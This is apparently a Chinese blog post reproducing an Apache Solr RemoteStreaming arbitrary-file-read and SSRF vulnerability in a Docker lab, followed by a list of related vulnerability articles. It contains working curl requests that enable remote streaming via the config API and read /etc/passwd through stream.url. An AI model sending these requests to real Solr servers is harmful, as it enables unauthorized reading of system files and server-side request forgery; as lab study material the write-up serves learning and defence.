2. 程式人生 > 其它 >Apache Solr RemoteStreaming 檔案讀取與SSRF漏洞

Apache Solr RemoteStreaming 檔案讀取與SSRF漏洞

阿新 發佈:2022-05-18

Apache Solr 是一個開源的搜尋伺服器。在Apache Solr未開啟認證的情況下,攻擊者可直接構造特定請求開啟特定配置,並最終造成SSRF或任意檔案讀取。

參考連結:

漏洞環境

執行如下命令啟動solr 8.8.1:

docker-compose up -d

環境啟動後,訪問http://your-ip:8983即可檢視Apache Solr後臺。

漏洞復現

首先,訪問http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

獲取資料庫名:

傳送如下資料包,修改資料庫demo的配置,開啟RemoteStreaming

curl -i -s -k -X $'POST' \
    -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
    $'http://192.168.75.130:8983/solr/demo/config'

再通過stream.url讀取任意檔案:

curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

相關推薦

Apache Solr RemoteStreaming 檔案讀取SSRF漏洞

Apache Solr 是一個開源的搜尋伺服器。在Apache Solr未開啟認證的情況下,攻擊者可直接構造特定請求開啟特定配置,並最終造成SSRF或任意檔案讀取

python應用檔案讀取登入註冊功能

python應用檔案讀取登入註冊功能,具體實現程式碼如下所示: #!/usr/bin/python3

【C# .NET 工具類 】二、文字檔案讀取寫入

1.讀取文字檔案 1 public partial class TextFile 2 { 3/// <summary> 4/// 讀取文字檔案

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

Apache Druid LoadData 任意檔案讀取漏洞-CVE-2021-36749

漏洞原理: 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP InputSource 來繞過應用程式級別的限制。由於 Apache Druid 預設情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況

Python 檔案操作之讀取檔案(read),檔案指標寫入檔案(write),檔案開啟方式示例

本文例項講述了Python 檔案操作之讀取檔案(read),檔案指標寫入檔案(write),檔案開啟方式。分享給大家供大家參考,具體如下:

使用Python對Dicom檔案進行讀取寫入的實現

Pydicom 單張影像的讀取 使用 pydicom.dcmread() 函式進行單張影像的讀取,返回一個pydicom.dataset.FileDataset物件.

Protobuf物件寫入檔案檔案讀取的工具

前提需要安裝Protobuf。 工具程式碼: 1 using System; 2 using System.IO; 3 4 public class ProtobufTool

CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞

0x01 漏洞描述 Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資

mysql任意檔案讀取漏洞復現

前言 第一次得知該漏洞後找了一些文章去看。 一開始不明白這個漏洞是怎麼來的,只知道通過在服務端執行poc指令碼就可以讀取客戶端的任意檔案,直接找到網上準備好的靶機進行測試,發現可行,然後就拿別人的poc試驗,

泛微雲橋e-Bridge-任意檔案讀取漏洞

1.資產查詢 Fofa: title="泛微雲橋 e-Bridge" 2.漏洞描述 泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

企業安全01-Apache solr XML實體注入漏洞CVE-2017-12629

Apache solr XML 實體注入漏洞CVE-2017-12629 一、簡介 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。原理大致是文件通過Http利用XML加到一個搜尋集合中。查

Unity Json檔案讀取寫入

主要是用Json檔案儲存場景內物體的位置名稱等資訊,並且用的時候需要讀取

風炫安全web安全學習第三十五節課 檔案下載和檔案讀取漏洞

風炫安全web安全學習第三十五節課檔案下載和檔案讀取漏洞 0x03 任意檔案下載漏洞

Python 使用 openpyxl 模組讀取、寫入 Excel 檔案教學範例

介紹如何在 Python 中使用 openpyxl 模組讀取寫入 Excel 的 *.xlsx 檔案。 Python 的 openpyxl 模組可用來讀取或寫入 Office Open XML 格式的 Excel 檔案,支援的檔案類型有 xlsx、xlsm、xltx、xltm,以下將示範如

Excel 讀取 XML 格式檔案教學範例

使用 Excel 內建的開發人員工具匯入 XML 檔案,將 XML 資料轉換為 Excel 表格。 Step 1

java實現xml檔案儲存讀取

   File GGCNimages_update1XMLFile = FileUtil.isExistXmlFile(\"http://www.baidu.com/sitemap.xml\", getContext());if (GGCNimages_update1XMLFile != null) {Log.d(\"debug\", \"從本地快取檔案中載入輪播圖

Apache Solr 遠端命令執行漏洞復現(CVE-2019-0193)

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Python-全域性配置檔案(conf.ini)的讀取寫入

一、conf.ini檔案輸寫格式:檔名:***.ini(固定格式), [節點] 選項 = 選項值 [database]-->節點section